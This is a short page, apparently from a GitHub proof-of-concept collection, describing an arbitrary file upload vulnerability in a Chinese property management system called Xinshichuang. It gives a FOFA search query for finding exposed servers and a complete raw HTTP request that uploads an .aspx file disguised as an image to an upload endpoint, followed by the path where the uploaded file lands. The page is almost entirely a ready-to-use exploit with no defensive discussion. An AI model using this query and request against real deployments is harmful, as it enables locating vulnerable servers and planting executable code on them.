Skip to content

Latest commit

 

History

History
30 lines (23 loc) · 792 Bytes

新视窗新一代物业管理系统任意文件上传漏洞.md

File metadata and controls

30 lines (23 loc) · 792 Bytes

新视窗新一代物业管理系统任意文件上传漏洞

fofa

body="BPMSite/ClientSupport/OCXInstall.aspx"

poc

POST /OfficeManagement/RegisterManager/Upload.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Cookie: JSESSIONID=FC2204F3698D2A07CDE9786055A071CB
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 146
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpg

GIF89a
123
--00content0boundary00--

文件路径:/Upload/ContractMamager/71d52920be4d-4956-93f9-77c3b0c899e81.aspx